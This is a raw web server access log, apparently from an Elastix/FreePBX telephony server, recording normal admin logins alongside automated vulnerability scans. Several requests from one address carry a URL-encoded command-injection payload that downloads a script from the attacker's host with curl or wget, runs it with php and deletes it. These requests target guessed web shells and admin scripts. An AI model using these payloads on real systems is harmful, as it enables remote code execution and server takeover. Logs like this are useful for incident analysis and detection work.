    213.202.233.77 - - [09/Jun/2017:19:11:51 -0400] "GET /jnkp.php HTTP/1.1" 404 206
    213.202.233.77 - - [09/Jun/2017:19:11:52 -0400] "GET /assets/jnkp.php HTTP/1.1" 404 213
    213.202.233.77 - - [09/Jun/2017:19:11:53 -0400] "GET /asterisk/jnkp.php HTTP/1.1" 404 216
    213.202.233.77 - - [09/Jun/2017:19:11:53 -0400] "GET /recordings/jnkp.php HTTP/1.1" 403 221
    13.58.12.77 - admin [09/Jun/2017:19:16:45 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - admin [09/Jun/2017:19:16:45 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:19:16:45 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
    13.58.12.77 - - [09/Jun/2017:19:16:45 -0400] "POST / HTTP/1.1" 200 5409
    163.172.69.33 - - [09/Jun/2017:19:44:46 -0400] "GET / HTTP/1.0" 400 362
    163.172.69.33 - - [09/Jun/2017:19:44:49 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
    163.172.69.33 - - [09/Jun/2017:19:48:53 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
    163.172.69.33 - - [09/Jun/2017:19:48:55 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
    163.172.69.33 - - [09/Jun/2017:19:49:43 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
    163.172.69.33 - - [09/Jun/2017:19:49:46 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
    137.116.71.170 - - [09/Jun/2017:19:58:21 -0400] "GET /robots.txt HTTP/1.1" 200 361
    13.58.12.77 - - [09/Jun/2017:20:10:48 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:10:49 -0400] "POST /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:10:49 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:10:48 -0400] "POST / HTTP/1.1" 200 5409
    163.172.64.146 - - [09/Jun/2017:20:12:42 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "POST /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "POST / HTTP/1.1" 200 5409
    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "POST /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "POST / HTTP/1.1" 200 5409
    200.116.88.105 - - [09/Jun/2017:21:16:50 -0400] "GET /a2billing/customer/javascript/misc.js HTTP/1.1" 404 235
    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "POST /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "GET /admin/config.php HTTP/1.1" 404 214
    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "POST / HTTP/1.1" 200 5409
    23.239.70.162 - - [09/Jun/2017:22:19:20 -0400] "GET / HTTP/1.1" 200 5409
    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET / HTTP/1.1" 200 5409
    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-edwidgets.js HTTP/1.1" 200 3152
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-migrate-1.2.1.js HTTP/1.1" 200 16621
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-ui-1.11.4.min.js HTTP/1.1" 200 240427
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-colResizable-1.5.min.js HTTP/1.1" 200 5852
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-blockUI.js HTTP/1.1" 200 19910
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-1.11.2.min.js HTTP/1.1" 200 95931
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-ui-timepicker-addon.js HTTP/1.1" 200 78611
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-colorpicker.js HTTP/1.1" 200 17292
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-easing.1.3.js HTTP/1.1" 200 8097
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/gsap/main-gsap.js HTTP/1.1" 200 99007
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/bootstrap.js HTTP/1.1" 200 58330
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/joinable.js HTTP/1.1" 200 119975
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/resizeable.js HTTP/1.1" 200 2406
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-api.js HTTP/1.1" 200 13926
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/jquery.validate.min.js HTTP/1.1" 200 21068
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-custom.js HTTP/1.1" 200 48302
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-login.js HTTP/1.1" 200 9031
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-demo.js HTTP/1.1" 200 1964
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/images/elastix_logo_mini.png HTTP/1.1" 200 6100
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 200 40320
    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /favicon.ico HTTP/1.1" 200 99678
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "POST / HTTP/1.1" 200 5409
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "POST / HTTP/1.1" 302 -
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /index.php HTTP/1.1" 200 70583
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/styles.css HTTP/1.1" 200 32972
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/help.css HTTP/1.1" 200 359
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/header.css HTTP/1.1" 200 9165
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/content.css HTTP/1.1" 200 7067
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/rightbar.css HTTP/1.1" 200 1254
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/css/1_style.css HTTP/1.1" 200 3056
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/applet.css HTTP/1.1" 200 1381
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/table.css HTTP/1.1" 200 6473
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/widgets.css HTTP/1.1" 200 485
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/base.js HTTP/1.1" 200 10924
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/sticky_note/sticky_note.css HTTP/1.1" 200 1825
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/sticky_note/sticky_note.js HTTP/1.1" 200 3207
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/1_javascript.js HTTP/1.1" 200 2324
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/iframe.js HTTP/1.1" 200 314
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/3_jquery.flot.time.js HTTP/1.1" 200 11768
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/5_justgage-1.1.0.min.js HTTP/1.1" 200 14662
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/4_raphael-2.1.4.min.js HTTP/1.1" 200 92764
    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/2_jquery.flot.js HTTP/1.1" 200 122971
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/elastix_logo_mini2.png HTTP/1.1" 200 5487
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/Icon-user.png HTTP/1.1" 200 21664
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/modalbox_bg.png HTTP/1.1" 200 1000
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /libs/font-icons/font-awesome/fonts/fontawesome-webfont.woff2?v=4.4.0 HTTP/1.1" 200 64464
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /libs/js/jquery/css/smoothness/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 200 208
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=registration&action=isRegistered&rawmode=yes HTTP/1.1" 200 178
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=PerformanceGraphic&action=getContent HTTP/1.1" 200 7518
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=SystemResources&action=getContent HTTP/1.1" 200 2339
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/SystemResources/js/javascript.js?=1497064534974 HTTP/1.1" 200 1363
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/SystemResources/tpl/css/styles.css HTTP/1.1" 200 223
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/images/applet_divisor.png HTTP/1.1" 200 998
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=CommunicationActivity&action=getContent HTTP/1.1" 200 2155
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=HardDrives&action=getContent HTTP/1.1" 200 1913
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=ProcessesStatus&action=getContent HTTP/1.1" 200 8406
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/CommunicationActivity/js/javascript.js?=1497064534975 HTTP/1.1" 200 628
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/CommunicationActivity/tpl/css/styles.css HTTP/1.1" 200 826
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/tpl/css/styles.css HTTP/1.1" 200 1065
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/js/javascript.js?=1497064534976 HTTP/1.1" 200 565
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/images/light_freespace.png HTTP/1.1" 200 958
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/images/light_usedspace.png HTTP/1.1" 200 958
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/tpl/css/styles.css HTTP/1.1" 200 1944
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/js/javascript.js?=1497064534977 HTTP/1.1" 200 2683
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_pbx.png HTTP/1.1" 200 2183
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_im.png HTTP/1.1" 200 2680
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/loading.gif HTTP/1.1" 200 2767
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_arrowdown.png HTTP/1.1" 200 1015
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_fax.png HTTP/1.1" 200 1506
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_headphones.png HTTP/1.1" 200 1905
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_www.png HTTP/1.1" 200 2655
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_db.png HTTP/1.1" 200 1637
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_email.png HTTP/1.1" 200 1998
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_arrowdown-disabled.png HTTP/1.1" 200 190
    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/bgicon.png HTTP/1.1" 200 1018
    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=News&action=getContent HTTP/1.1" 200 4889
    76.108.242.230 - - [09/Jun/2017:23:15:38 -0400] "GET /modules/dashboard/applets/News/tpl/css/styles.css HTTP/1.1" 200 934
    76.108.242.230 - - [09/Jun/2017:23:15:41 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=SystemResources&action=updateStatus HTTP/1.1" 200 98
    76.108.242.230 - - [09/Jun/2017:23:15:41 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=CommunicationActivity&action=updateStatus HTTP/1.1" 200 83
    76.108.242.230 - - [09/Jun/2017:23:15:44 -0400] "GET /index.php?menu=pbxadmin HTTP/1.1" 500 -
    76.108.242.230 - - [09/Jun/2017:23:15:45 -0400] "GET /index.php HTTP/1.1" 500 -
    92.114.32.161 - - [09/Jun/2017:23:39:42 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
    92.114.32.161 - - [09/Jun/2017:23:39:43 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
    92.114.32.161 - - [09/Jun/2017:23:53:55 -0400] "GET /recordings/ HTTP/1.1" 500 -
    92.114.32.161 - - [09/Jun/2017:23:53:56 -0400] "GET /recordings/ HTTP/1.1" 500 -
    92.114.32.161 - - [10/Jun/2017:00:17:47 -0400] "GET /recordings/ HTTP/1.1" 500 -
    92.114.32.161 - - [10/Jun/2017:00:17:47 -0400] "GET / HTTP/1.0" 400 362
    92.114.32.161 - - [10/Jun/2017:00:24:24 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
    92.114.32.161 - - [10/Jun/2017:00:24:24 -0400] "GET / HTTP/1.0" 400 362
    163.172.64.146 - - [10/Jun/2017:04:53:29 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
    51.15.12.13 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 500 -
    51.15.12.13 - - [10/Jun/2017:04:55:42 -0400] "POST /admin/ajax.php?module=music HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:55:44 -0400] "POST /admin/ajax.php?module=blacklist HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:55:45 -0400] "POST /admin/ajax.php?module=recordings HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:55:46 -0400] "GET /admin/ajax.php HTTP/1.1" 404 212
    51.15.12.13 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id HTTP/1.1" 404 214
    51.15.12.13 - - [10/Jun/2017:04:55:48 -0400] "GET /admin/modules/backup/page.backup.php HTTP/1.1" 404 234
    51.15.12.13 - - [10/Jun/2017:04:55:49 -0400] "POST /vtigercrm/phprint.php HTTP/1.1" 404 219
    51.15.12.13 - - [10/Jun/2017:04:55:50 -0400] "POST / HTTP/1.1" 200 5409
    51.15.12.13 - - [10/Jun/2017:04:55:51 -0400] "POST /admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 404 264
    51.15.12.13 - - [10/Jun/2017:04:55:51 -0400] "POST /recordings/jeep.php HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:55:52 -0400] "POST /admin/bootstrap.inc.php?mgp=danc3Uf%40t HTTP/1.1" 404 221
    51.15.12.13 - - [10/Jun/2017:04:55:52 -0400] "POST /recordings/a7a.php HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:53 -0400] "POST /recordings/emad-shell.php HTTP/1.1" 403 227
    51.15.12.13 - - [10/Jun/2017:04:55:53 -0400] "POST /recordings/emad.php HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/cmd.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/mcd.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/dmc.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:55 -0400] "POST /recordings/cmd.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:55 -0400] "POST /recordings/mcd.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:56 -0400] "POST /recordings/dmc.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:56 -0400] "POST /recordings/cmd.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:57 -0400] "POST /recordings/mcd.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:57 -0400] "POST /recordings/dmc.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
    51.15.12.13 - - [10/Jun/2017:04:55:58 -0400] "POST /recordings/config.amportal.php HTTP/1.1" 403 232
    51.15.12.13 - - [10/Jun/2017:04:55:58 -0400] "POST /recordings/scan.php HTTP/1.1" 403 221
    51.15.12.13 - - [10/Jun/2017:04:55:59 -0400] "POST /vtigercrm/a7a.php HTTP/1.1" 404 215
